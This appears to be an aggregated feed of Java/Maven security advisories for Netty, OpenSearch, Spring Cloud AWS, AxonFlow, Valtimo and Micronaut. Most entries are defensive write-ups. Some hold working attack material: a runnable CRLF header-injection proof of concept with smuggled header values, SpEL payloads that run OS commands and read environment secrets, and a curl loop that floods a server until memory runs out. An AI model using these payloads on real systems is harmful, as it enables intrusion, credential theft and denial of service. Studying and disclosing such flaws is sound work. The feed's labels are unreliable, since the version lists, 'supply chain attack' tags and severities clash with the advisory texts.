📦 io.netty:netty-handler-proxy 📌 4.1.0.Beta4, 4.1.0.Beta5, 4.1.0.Beta6, 4.1.0.Beta7, 4.1.0.Beta8 ⛓️‍💥 Supply-chain attack ☕ Java Maven library ⚪ Not exploited 🟢 Patched
💬 # Security Vulnerability Report: HTTP Header Injection via HttpProxyHandler Disabled Validation in Netty ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions) | | **Component** | `io.netty.h...
📅 2026-05-07 OSV/Maven 🔗 Details

Full Description

# Security Vulnerability Report: HTTP Header Injection via HttpProxyHandler Disabled Validation in Netty

## 1. Vulnerability Summary

| Field | Value |
|-------|-------|
| **Product** | Netty |
| **Version** | 4.2.12.Final (and all prior versions) |
| **Component** | `io.netty.handler.proxy.HttpProxyHandler` |
| **Vulnerability Type** | CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers |
| **Impact** | HTTP Header Injection in CONNECT Proxy Requests |
| **CVSS 3.1 Score** | **7.5 (High)** |
| **CVSS 3.1 Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` |
| **Related Advisory** | **GHSA-84h7-rjj3-6jx4** (Incomplete Fix) |

## 2. Affected Components

- `io.netty.handler.proxy.HttpProxyHandler` — `newInitialMessage()` method (line 176) explicitly disables header validation via `withValidation(false)`

## 3. Vulnerability Description

Netty's `HttpProxyHandler` constructs HTTP CONNECT requests with **header validation explicitly disabled**. The `newInitialMessage()` method (line 176) creates headers using `DefaultHttpHeadersFactory.headersFactory().withValidation(false)`, then adds user-provided `outboundHeaders` (lines 188-190) without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server.

### Root Cause

```java
// HttpProxyHandler.java:176-190
protected Object newInitialMessage(ChannelHandlerContext ctx) throws Exception {
    // ...
    HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory()
            .withValidation(false); // <-- VALIDATION EXPLICITLY DISABLED
    FullHttpRequest req = new DefaultFullHttpRequest(
            HttpVersion.HTTP_1_1, HttpMethod.CONNECT, url,
            Unpooled.EMPTY_BUFFER, headersFactory, headersFactory);
    req.headers().set(HttpHeaderNames.HOST, hostHeader);
    if (authorization != null) {
        req.headers().set(HttpHeaderNames.PROXY_AUTHORIZATION, authorization);
    }
    if (outboundHeaders != null) {
        req.headers().add(outboundHeaders); // <-- USER HEADERS ADDED WITHOUT VALIDATION
    }
    return req;
}
```

The `outboundHeaders` parameter comes from the `HttpProxyHandler` constructor (lines 80-93, 99-127), which is supplied by application code.

### Incomplete Fix of GHSA-84h7-rjj3-6jx4

**This vulnerability represents an incomplete fix of the previously acknowledged security advisory [GHSA-84h7-rjj3-6jx4](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4).**

The GHSA-84h7-rjj3-6jx4 fix addressed HTTP CRLF injection by adding URI validation via `validateRequestLineTokens()` in `DefaultHttpRequest` and enabling header validation by default through `DefaultHttpHeadersFactory`. However, `HttpProxyHandler` **explicitly opts out** of the fix by calling `withValidation(false)`, creating a gap where:

1. The GHSA-84h7-rjj3-6jx4 fix's header validation is bypassed
2. User-provided `outboundHeaders` are added without any CRLF check
3. The resulting CONNECT request contains unvalidated headers on the wire

This is not a new vulnerability class — it is the **same CRLF injection** that GHSA-84h7-rjj3-6jx4 was supposed to fix, but `HttpProxyHandler` was missed during the remediation. The fix for GHSA-84h7-rjj3-6jx4 should be extended to cover this code path.

## 4. Exploitability Prerequisites

This vulnerability is exploitable when:

1. An application uses `HttpProxyHandler` with user-influenced `outboundHeaders`
2. The application does not perform its own CRLF sanitization on header values

**Common affected patterns**:

- HTTP proxy clients that forward user-specified custom headers
- Web scraping frameworks that allow users to set proxy headers
- API gateways that pass user headers through a proxy tunnel

## 5. Attack Scenarios

### Scenario 1: Proxy Authentication Bypass

```java
HttpHeaders headers = new DefaultHttpHeaders(false);
headers.set("X-Forwarded-For", userInput); // userInput from attacker
new HttpProxyHandler(proxyAddr, headers);
```

**Attack input**: `userInput = "1.2.3.4\r\nProxy-Authorization: Basic YWRtaW46YWRtaW4="`

**Wire format**:

```
CONNECT target.com:443 HTTP/1.1
host: target.com:443
X-Forwarded-For: 1.2.3.4
Proxy-Authorization: Basic YWRtaW46YWRtaW4=   <-- INJECTED
```

The injected `Proxy-Authorization` header may override or supplement the original authentication, potentially granting access to a restricted proxy.

### Scenario 2: Request Smuggling via Proxy

**Attack input**: `userInput = "value\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /internal HTTP/1.1\r\nHost: internal-service"`

Injects a full smuggled request through the proxy tunnel establishment.

## 6. Proof of Concept

### Full Runnable PoC Source Code (HttpProxyHeaderInjectionPoC.java)

```java
import io.netty.buffer.ByteBuf;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.*;

import java.nio.charset.StandardCharsets;

public class HttpProxyHeaderInjectionPoC {
    public static void main(String[] args) {
        System.out.println("=== Netty HttpProxyHandler Header Injection PoC ===\n");

        // Simulate HttpProxyHandler.newInitialMessage() with validation=false
        HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory()
                .withValidation(false);
        FullHttpRequest req = new DefaultFullHttpRequest(
                HttpVersion.HTTP_1_1, HttpMethod.CONNECT, "target.com:443",
                io.netty.buffer.Unpooled.EMPTY_BUFFER, headersFactory, headersFactory);
        req.headers().set(HttpHeaderNames.HOST, "target.com:443");

        // Inject CRLF in header value
        String malicious = "1.2.3.4\r\nX-Forwarded-For: 127.0.0.1\r\nX-Admin: true";
        req.headers().set("X-Forwarded-For", malicious);

        // Encode to wire format
        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestEncoder());
        ch.writeOutbound(req);
        ByteBuf out = ch.readOutbound();
        String encoded = out.toString(StandardCharsets.UTF_8);
        out.release();
        ch.finishAndReleaseAll();

        System.out.println("Wire format:");
        for (String line : encoded.split("\n", -1)) {
            System.out.println("  " + line.replace("\r", "\\r"));
        }
        System.out.println("Injected X-Admin: " + encoded.contains("X-Admin: true"));
        System.out.println("VULNERABLE: " + (encoded.contains("X-Admin: true") ? "YES" : "NO"));
    }
}
```

### PoC Execution Output (Verified on Netty 4.2.12.Final)

```
=== Netty HttpProxyHandler Header Injection PoC ===

[TEST 1] outboundHeaders with CRLF (validation disabled)
----------------------------------------------------------
Injected header value: "1.2.3.4\r\nX-Forwarded-For: 127.0.0.1\r\nX-Admin: true"
Header accepted: YES (validation disabled!)
Wire format:
  CONNECT target.com:443 HTTP/1.1\r
  host: target.com:443\r
  X-Forwarded-For: 1.2.3.4\r
  X-Forwarded-For: 127.0.0.1\r    <-- INJECTED
  X-Admin: true\r                 <-- INJECTED
  \r
Injected X-Admin header in wire: true
VULNERABLE: YES

[TEST 2] validation=true vs validation=false comparison
--------------------------------------------------------
With validation=true:  SAFE: Rejected - IllegalArgumentException
With validation=false: VULNERABLE: Accepted CRLF in header value!
Stored value contains CRLF: true
```

## 7. Remediation Recommendations

### Option 1: Remove withValidation(false)

```java
// Change HttpProxyHandler.java line 176 from:
HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory().withValidation(false);
// To:
HttpHeadersFactory headersFactory = DefaultHttpHeadersFactory.headersFactory();
```

### Option 2: Validate outboundHeaders Before Adding

```java
if (outboundHeaders != null) {
    for (Map.Entry<String, String> entry : outboundHeaders) {
        HttpUtil.validateHeaderValue(entry.getValue());
    }
    req.headers().add(outboundHeaders);
}
```

## 8. Resources

- [GHSA-84h7-rjj3-6jx4: Netty HTTP CRLF Injection (**incomplete fix — this report**)](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4)
- [CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers](https://cwe.mitre.org/data/definitions/113.html)

Affected Versions

4.1.0.Beta4, 4.1.0.Beta5, 4.1.0.Beta6, 4.1.0.Beta7, 4.1.0.Beta8

Low
📦 org.opensearch.plugin:opensearch-security 📌 2.18.0.0, 2.19.0.0, 2.19.1.0, 2.19.2.0, 2.19.3.0 📝 Content management ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Description A regression was introduced in OpenSearch 2.18.0 that caused the `plugins.security.ssl.transport.enforce_hostname_verification` setting to be ineffective. When this setting was enabled, OpenSearch did not verify that the hostname in a connecting node's TLS certif...
📅 2026-05-07 OSV/Maven 🔗 Details

Full Description

### Description

A regression was introduced in OpenSearch 2.18.0 that caused the `plugins.security.ssl.transport.enforce_hostname_verification` setting to be ineffective. When this setting was enabled, OpenSearch did not verify that the hostname in a connecting node's TLS certificate matched the hostname of the connection. This could allow a node with a valid certificate (signed by the cluster's trusted CA) but an incorrect hostname SAN to join the cluster.

### Impact

Clusters running affected versions with hostname verification enabled did not receive the expected protection from this setting. A node presenting a certificate signed by the cluster's trusted CA could join the cluster regardless of whether its hostname SAN matched. This regression does not affect certificate validation itself — only the additional hostname verification check.

### Patches

This issue is fixed in OpenSearch 2.19.4 and 3.3.0.

### Workarounds

Use more restrictive values for `plugins.security.nodes_dn` to limit which certificates are accepted for node-to-node communication.
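For reference, both the affected setting and the suggested workaround live in `opensearch.yml`. A minimal sketch (the DN pattern below is a placeholder — substitute the subjects of your own node certificates):

```yaml
# opensearch.yml — illustrative sketch
plugins.security.ssl.transport.enforce_hostname_verification: true

# Workaround on affected versions: restrict which certificate subjects
# are accepted for node-to-node transport (placeholder DN below)
plugins.security.nodes_dn:
  - "CN=node-*.cluster.example.com,OU=Ops,O=Example"
```

Pinning `nodes_dn` limits the blast radius even while the hostname check is inoperative, since a certificate must match an allowed DN pattern in addition to chaining to the trusted CA.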

Affected Versions

2.18.0.0, 2.19.0.0, 2.19.1.0, 2.19.2.0, 2.19.3.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

Unspecified
📦 org.opensearch.plugin:opensearch-security 📌 2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0 📝 Content management ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Description A flaw was identified in the OpenSearch Security plugin's document-level security (DLS) implementation. DLS restrictions were not correctly applied to search queries that use has_parent or has_child join relations. This could allow an authenticated user to access...
📅 2026-05-07 OSV/Maven 🔗 Details

Full Description

### Description

A flaw was identified in the OpenSearch Security plugin's document-level security (DLS) implementation. DLS restrictions were not correctly applied to search queries that use `has_parent` or `has_child` join relations. This could allow an authenticated user to access document contents that should have been restricted by DLS rules.

### Impact

An authenticated user with access to an index containing parent/child join relations could bypass DLS restrictions on documents linked by those relations, potentially accessing restricted document contents. This only affects clusters that use both DLS and the `join` field type on the same index.

### Patches

This issue is fixed in OpenSearch `2.19.4` and `3.2.0`.

### Workarounds

Avoid using the `join` field type on indices that are subject to DLS rules.
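As an illustration of the affected query shape (index and relation names here are hypothetical), a `has_child` search with `inner_hits` returns child documents through the join relation — the traversal path on which DLS filtering was not applied. For example, `POST /tickets/_search` with a body like:

```json
{
  "query": {
    "has_child": {
      "type": "comment",
      "query": { "match_all": {} },
      "inner_hits": {}
    }
  }
}
```

On a patched cluster, documents returned via `inner_hits` are subject to the same DLS filters as a direct search against the index.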

Affected Versions

2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Low
📦 org.opensearch.plugin:opensearch-security 📌 2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0 📝 Content management ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Description A flaw was identified in the OpenSearch Security plugin's handling of index rollover requests. When a rollover request included an explicit target index name, the security plugin did not properly evaluate access control permissions against the target index. This ...
📅 2026-05-07 OSV/Maven 🔗 Details

Full Description

### Description

A flaw was identified in the OpenSearch Security plugin's handling of index rollover requests. When a rollover request included an explicit target index name, the security plugin did not properly evaluate access control permissions against the target index. This could allow a user with rollover permissions on a source index to create a new index with a name they are not authorized to use.

### Impact

A user with `indices:admin/rollover` permission on a source index pattern could roll over to a target index name outside their authorized index patterns. This is limited to index creation via the rollover API and requires the user to already have rollover privileges on the source index.

### Patches

This issue is fixed in OpenSearch 2.19.4 and 3.2.0.

### Workarounds

Grant the `indices:admin/rollover` permission only to fully trusted users.
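The rollover API accepts an optional explicit target index name in the request path; a hypothetical request of the shape described above (alias and index names are placeholders) would look like:

```
POST /logs-write/_rollover/forbidden-target-index
{
  "conditions": { "max_docs": 1 }
}
```

On affected versions the permission check covered the source (`logs-write`) but not the explicitly named target, so `forbidden-target-index` could be created outside the caller's authorized index patterns.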

Affected Versions

2.1.0.0, 2.10.0.0, 2.11.0.0, 2.11.1.0, 2.12.0.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

Low
📦 org.opensearch.plugin:opensearch-security 📌 2.11.0.0, 2.11.1.0, 2.12.0.0, 2.13.0.0, 2.14.0.0 📝 Content management ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Description A flaw was identified in the OpenSearch REST layer that could allow authorization checks to be bypassed when processing certain malformed HTTP requests. This could permit unauthorized access to restricted API endpoints in environments that rely on REST-layer auth...
📅 2026-05-07 OSV/Maven 🔗 Details

Full Description

### Description

A flaw was identified in the OpenSearch REST layer that could allow authorization checks to be bypassed when processing certain malformed HTTP requests. This could permit unauthorized access to restricted API endpoints in environments that rely on REST-layer authorization. Transport-level authorization is not affected by this issue.

### Impact

The default OpenSearch distribution is not affected by this issue. REST actions in the default distribution have corresponding transport actions that independently enforce authorization. Custom plugins that register REST actions without a corresponding transport action may be affected, potentially allowing unauthorized read access to those endpoints.

### Patches

This issue is fixed in OpenSearch 2.19.0. Users should upgrade to 2.19.0 or later.

Affected Versions

2.11.0.0, 2.11.1.0, 2.12.0.0, 2.13.0.0, 2.14.0.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Unspecified
📦 io.awspring.cloud:spring-cloud-aws-sns 📌 4.0.0, 4.0.1 🗄️ Server ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact Applications using Spring Cloud AWS SNS HTTP/HTTPS endpoint support (@NotificationMessageMapping, @NotificationSubscriptionMapping, @NotificationUnsubscribeConfirmationMapping) did not verify the signature of incoming SNS messages. An unauthenticated attacker who...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

### Impact
Applications using Spring Cloud AWS SNS HTTP/HTTPS endpoint support (@NotificationMessageMapping, @NotificationSubscriptionMapping, @NotificationUnsubscribeConfirmationMapping) did not verify the signature of incoming SNS messages. An unauthenticated attacker who knows the endpoint URL could send crafted HTTP POST requests mimicking SNS Notification or SubscriptionConfirmation messages, causing the application to:

- Process arbitrary payloads as if they were legitimate SNS notifications.
- Auto-confirm subscriptions or unsubscribe from attacker-controlled topics.

Affected versions: 3.0.0 through 3.4.2, 4.0.0, and 4.0.1. The 3.x line will not receive a fix; users on 3.x should apply the workaround below or upgrade to 4.0.2.

### Patches
Fixed in Spring Cloud AWS 4.0.2. When using Spring Boot auto-configuration, signature verification is enabled by default. Users should upgrade to 4.0.2.

### Workarounds
Manually verify the SNS message signature in a servlet filter or Spring HandlerInterceptor before the request reaches the controller, using SnsMessageManager from the AWS SDK v2 sns-message-manager module.

### Resources
- AWS SNS: Verifying the signatures of Amazon SNS messages (https://docs.aws.amazon.com/sns/latest/dg/sns-verify-signature-of-message.html)
- AWS SDK for Java v2: SnsMessageManager (https://sdk.amazonaws.com/java/api/latest/software/amazon/awssdk/messagemanager/sns/SnsMessageManager.html)
- Fix PR: #1614
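The workaround hinges on reconstructing the exact string that AWS signs. A minimal sketch of building that canonical string, based on the AWS signature-verification documentation (verifying the RSA signature against the certificate fetched from `SigningCertURL` is a separate step not shown here):

```python
def sns_string_to_sign(msg: dict) -> bytes:
    """Build the canonical string AWS signs for an SNS message.

    Notification messages sign one field set; SubscriptionConfirmation /
    UnsubscribeConfirmation messages sign another. Each present field
    contributes its name and value, each newline-terminated, in order.
    """
    if msg["Type"] == "Notification":
        keys = ["Message", "MessageId", "Subject", "Timestamp", "TopicArn", "Type"]
    else:  # SubscriptionConfirmation / UnsubscribeConfirmation
        keys = ["Message", "MessageId", "SubscribeURL", "Timestamp", "Token", "TopicArn", "Type"]
    parts = []
    for k in keys:
        if k in msg:  # Subject is optional on Notification messages
            parts.extend([k, msg[k]])
    return ("\n".join(parts) + "\n").encode("utf-8")
```

A filter implementing the workaround would build this string from the POSTed JSON body, then verify the message's `Signature` field against the certificate from `SigningCertURL` (after checking that the URL points at a genuine AWS host).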

Affected versions

4.0.0, 4.0.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Unspecified
📦 com.getaxonflow:axonflow-sdk 📌 1.0.0, 1.1.0, 1.1.1, 1.1.2, 1.10.0 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## Summary The AxonFlow SDK's `WebhookSubscription` (or equivalent) type did not expose the HMAC-SHA256 signing key returned by the platform's `CreateWebhook` endpoint. Without access to the secret through the typed SDK API, callers had no path to verify the `X-AxonFlow-Signatur...
📅 2026-05-06 OSV/Maven 🔗 Details

Full description

## Summary
The AxonFlow SDK's `WebhookSubscription` (or equivalent) type did not expose the HMAC-SHA256 signing key returned by the platform's `CreateWebhook` endpoint. Without access to the secret through the typed SDK API, callers had no path to verify the `X-AxonFlow-Signature` header on incoming webhook deliveries. Affected callers had two unsatisfactory options:

1. Skip signature verification entirely — accepting any payload from any source that knew the webhook URL.
2. Hand-parse the raw HTTP JSON response to extract the secret, bypassing the type-safe SDK surface.

This advisory is filed across all four AxonFlow SDKs (Go, Python, TypeScript, Java) because the same defect and the same fix landed in each.

## Affected versions
Versions prior to 6.0.0.

## Impact
A webhook receiver using the SDK's typed API to handle inbound deliveries had no path to authenticate the source of incoming payloads. An attacker who learned the webhook URL — through misconfiguration, log leakage, observable network traffic during setup, or any other discovery channel — could forge webhook deliveries indistinguishable from legitimate ones, causing the receiving application to act on fabricated events (e.g. simulated approval-granted callbacks, simulated policy-decision callbacks, simulated step-completion callbacks).

## Remediation
Upgrade to the patched version listed in Vulnerabilities below. The signing key is now exposed on the `WebhookSubscription` response type returned by `CreateWebhook`. Implementations should:

1. Persist the secret returned by `CreateWebhook` securely (it is only returned once, at create time).
2. On each incoming webhook delivery, compute `HMAC-SHA256(secret, raw_body)` and compare it in constant time against the `X-AxonFlow-Signature` header.
3. Reject any delivery whose signature does not match.

## Credit
Identified by AxonFlow internal security review during the April 2026 quality-freeze epic.
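Step 2 of the remediation can be sketched in a few lines; the hex encoding of the header value is an assumption here — adjust to whatever format the platform actually documents:

```python
import hashlib
import hmac

def verify_axonflow_signature(secret: str, raw_body: bytes, signature_header: str) -> bool:
    """Recompute HMAC-SHA256 over the raw (unparsed) request body and
    compare in constant time, as the advisory prescribes.

    Assumes X-AxonFlow-Signature carries a lowercase hex digest; the
    actual encoding is platform-defined.
    """
    expected = hmac.new(secret.encode("utf-8"), raw_body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature_header)
```

`hmac.compare_digest` avoids the timing side channel of an ordinary string comparison. Always hash the raw bytes as received, before any JSON parsing or re-serialization, since re-serialized JSON rarely matches byte-for-byte.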

Affected versions

1.0.0, 1.1.0, 1.1.1, 1.1.2, 1.10.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

High
📦 io.netty:netty-transport-native-epoll 📌 4.0.16.Final, 4.0.17.Final, 4.0.18.Final, 4.0.19.Final, 4.0.20.Final ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## Summary Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread. ## Affected versions All version...
📅 2026-05-06 OSV/Maven 🔗 Details

Full description

## Summary
Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread.

## Affected versions
All versions of 4.2.x `netty-transport-native-epoll` up to and including 4.2.12.Final.

## Fixed in
4.2.13.Final (fix merged into the `4.2` branch via [#16689](https://github.com/netty/netty/pull/16689); release not yet cut as of 2026-04-25).

## Severity
**Medium** — Denial of Service (resource exhaustion / CPU spin)

**CWE:** CWE-772: Missing Release of Resource after Effective Lifetime

## Description
When a TCP connection using Netty's epoll transport has `ALLOW_HALF_CLOSURE` enabled (or is in a half-closed state via the HTTP codec), and the remote peer:

1. Sends a FIN (half-close), causing the server to mark the input as shutdown, then
2. Sends a RST (e.g. by closing with `SO_LINGER=0`)

the server-side channel is never closed. This happens because:

- `epollOutReady()` is a no-op when there is no pending flush.
- `epollInReady()` short-circuits via `shouldBreakEpollInReady()` because input is already marked as shutdown.
- The `EPOLLERR`/`EPOLLHUP` error condition is therefore never processed, and `channelInactive` is never fired.

Depending on the Netty version and configuration, this results in:

- **Stale channels**: The connection is never closed or deregistered. An unauthenticated remote attacker can repeat the sequence to accumulate stale connections, exhausting file descriptors, memory, or connection-count limits.
- **CPU busy-loop**: In code paths where `clearEpollIn0()` is not called during the `ChannelInputShutdownReadComplete` event, `epoll_wait` returns immediately on every iteration for the affected fd, causing 100% CPU utilization on the event loop thread and starving all other connections multiplexed on it.

## Mitigation
- Upgrade to 4.2.13.Final when released (or build from the `4.2` branch at commit [`0ec3d97`](https://github.com/netty/netty/commit/0ec3d97fab376e243d328ac95fbd288ba0f6e22d)).
- If upgrading is not immediately possible, configure idle timeouts on connections to limit the lifetime of stale channels.

## Resources
- Issue: https://github.com/netty/netty/issues/16683
- Fix: https://github.com/netty/netty/pull/16689
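The FIN-then-RST trigger sequence described above can be reproduced from the client side with plain sockets; a sketch (host and port are placeholders for a local test server):

```python
import socket
import struct

def half_close_then_rst(host: str, port: int) -> None:
    """Client-side sketch of the trigger: FIN via shutdown(), then RST
    by closing with SO_LINGER set to linger=on, timeout=0."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.shutdown(socket.SHUT_WR)  # step 1: send FIN — the peer sees a half-close
    # step 2: SO_LINGER with linger on and a zero timeout makes close()
    # abort the connection with a RST instead of a normal FIN handshake
    s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
    s.close()
```

Repeating this against an affected server with `ALLOW_HALF_CLOSURE` enabled accumulates the stale channels the advisory describes; against a patched server each channel fires `channelInactive` and is released.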

Affected versions

4.0.16.Final, 4.0.17.Final, 4.0.18.Final, 4.0.19.Final, 4.0.20.Final

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Critical
📦 com.ritense.valtimo:document 📌 12.0.0.RELEASE, 12.0.1.RELEASE, 12.1.0.RELEASE, 12.1.1.RELEASE, 12.1.2.RELEASE ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary Multiple classes evaluate Spring Expression Language (SpEL) expressions from user-supplied input using `StandardEvaluationContext`, which provides unrestricted access to Java types and methods. An authenticated user with the ADMIN role can achieve Remote Code Executi...
📅 2026-05-06 OSV/Maven 🔗 Details

Full description

### Summary
Multiple classes evaluate Spring Expression Language (SpEL) expressions from user-supplied input using `StandardEvaluationContext`, which provides unrestricted access to Java types and methods. An authenticated user with the ADMIN role can achieve Remote Code Execution and credential exfiltration.

### Impact
An attacker with ADMIN credentials can:

- **Execute arbitrary OS commands** via `T(java.lang.Runtime).getRuntime().exec('...')`
- **Exfiltrate all environment variables** (database passwords, API keys, Keycloak secrets) via `T(java.lang.System).getenv()`
- **Read JVM system properties** via `T(java.lang.System).getProperties()`
- **Load arbitrary classes** via `T(java.lang.Class).forName('...')`

### Affected Components

**1. DocumentMigrationService** (since 12.0.0)

Exploitable through the document migration REST API:

- `POST /api/management/v1/document-definition/migrate`
- `POST /api/management/v1/document-definition/migration/conflicts`

The malicious SpEL expression is supplied in the `source` or `target` field of a `DocumentMigrationPatch` object in the request body, using the `${...}` template syntax.

- In 12.x: `com.ritense.document.service.DocumentMigrationService#handleSpelExpression` (document module)
- In 13.x: same class, moved to the case module

**2. Condition** (since 13.4.0)

Exploitable through any admin-configured widget, dashboard, or feature that uses the `Condition` framework. The SpEL expression is supplied in the `value` field of a condition's JSON configuration.

- `com.ritense.valtimo.contract.conditions.Condition#resolveValue` (contract module)

This component has a significantly wider attack surface than DocumentMigrationService, as conditions are used across many modules.

### Remediation
Replace `StandardEvaluationContext` with `SimpleEvaluationContext` in both affected classes, which disallows Java type references and arbitrary method invocation:

```kotlin
val evaluationContext = SimpleEvaluationContext
    .forPropertyAccessors(MapAccessor(), jsonPropertyAccessor)
    .build()
```

Affected versions

12.0.0.RELEASE, 12.0.1.RELEASE, 12.1.0.RELEASE, 12.1.1.RELEASE, 12.1.2.RELEASE

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

High
📦 io.micronaut:micronaut-context 📌 4.10.0, 4.10.1, 4.10.10, 4.10.11, 4.10.12 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## Summary `TimeConverterRegistrar` caches `DateTimeFormatter` instances in an unbounded `ConcurrentHashMap<String, DateTimeFormatter>` whose key is derived from the `@Format` annotation pattern concatenated with the locale from the HTTP `Accept-Language` header. Because `Locale...
📅 2026-05-06 OSV/Maven 🔗 Details

Full description

## Summary
`TimeConverterRegistrar` caches `DateTimeFormatter` instances in an unbounded `ConcurrentHashMap<String, DateTimeFormatter>` whose key is derived from the `@Format` annotation pattern concatenated with the locale from the HTTP `Accept-Language` header. Because `Locale.forLanguageTag()` accepts arbitrary BCP 47 private-use extensions (`en-x-a001`, `en-x-a002`, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This is structurally identical to the recently patched GHSA-2hcp-gjrf-7fhc (`DefaultHtmlErrorResponseBodyProvider`), but `TimeConverterRegistrar.formattersCache` was not covered by that fix.

## Details
The vulnerable cache is declared in `context/src/main/java/io/micronaut/runtime/converters/time/TimeConverterRegistrar.java` at line 123:

```java
// TimeConverterRegistrar.java:123
private final Map<String, DateTimeFormatter> formattersCache = new ConcurrentHashMap<>();
```

The `getFormatter` method at line 434 inserts into this map with no eviction or size limit:

```java
// TimeConverterRegistrar.java:434-443
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
    var key = pattern + context.getLocale(); // locale from Accept-Language header
    var cachedFormatter = formattersCache.get(key);
    if (cachedFormatter != null) {
        return cachedFormatter;
    }
    var formatter = DateTimeFormatter.ofPattern(pattern, context.getLocale());
    formattersCache.put(key, formatter); // NO SIZE CHECK — unbounded growth
    return formatter;
}
```

The attacker-controlled locale flows into the cache key through this call chain:

1. **HTTP header parsed** — `HttpHeaders.findAcceptLanguage()` at `http/src/main/java/io/micronaut/http/HttpHeaders.java:766-771` calls `Locale.forLanguageTag(part)` directly on the raw `Accept-Language` value:

```java
// HttpHeaders.java:766-771
default Optional<Locale> findAcceptLanguage() {
    return findFirst(HttpHeaders.ACCEPT_LANGUAGE)
        .map(text -> {
            String part = HttpHeadersUtil.splitAcceptHeader(text);
            return part == null ? Locale.getDefault() : Locale.forLanguageTag(part);
        });
}
```

2. **Locale planted in ConversionContext** — `AbstractRouteMatch.newContext()` at `router/src/main/java/io/micronaut/web/router/AbstractRouteMatch.java:373-378` passes the request locale into the conversion context for every route argument binding:

```java
// AbstractRouteMatch.java:373-378
private <E> ArgumentConversionContext<E> newContext(Argument<E> argument, HttpRequest<?> request) {
    return ConversionContext.of(
        argument,
        request.getLocale().orElse(null), // ← attacker-controlled via Accept-Language
        request.getCharacterEncoding()
    );
}
```

3. **Unbounded cache insert** — When any temporal argument annotated with `@Format` is bound, `TimeConverterRegistrar.getFormatter(pattern, context)` is called and inserts a new `DateTimeFormatter` for each unique `pattern + locale` key.

This path is triggered for any route endpoint with a `@Format`-annotated temporal parameter. This is an officially documented and commonly used Micronaut pattern, demonstrated in the framework's own test suite:

```java
// test-suite/.../BindingController.java:105 (official Micronaut example)
@Get("/dateFormat")
public String dateFormat(@Format("dd/MM/yyyy hh:mm:ss a z") @Header ZonedDateTime date) {
    return date.toString();
}
```

`TimeConverterRegistrar` is an `@Internal` core bean registered unconditionally in every Micronaut application — it is not optional or user-configured.

By contrast, the `DefaultHtmlErrorResponseBodyProvider` cache patched in GHSA-2hcp-gjrf-7fhc now uses a `ConcurrentLinkedHashMap` bounded at 100 entries; `TimeConverterRegistrar.formattersCache` remains an unbounded plain `ConcurrentHashMap`.

## PoC
Against any Micronaut application exposing an endpoint with a `@Format`-annotated temporal parameter:

```bash
# Flood the formattersCache with unique locale-derived keys
for i in $(seq 1 200000); do
  curl -s -o /dev/null \
    -H "Accept-Language: en-x-$(printf '%06d' $i)" \
    -H "date: 01/01/2024 12:00:00 AM UTC" \
    "http://localhost:8080/dateFormat" &
  # Throttle to avoid socket exhaustion
  [ $((i % 500)) -eq 0 ] && wait
done
wait
# Server will throw OutOfMemoryError after enough unique locale entries accumulate
```

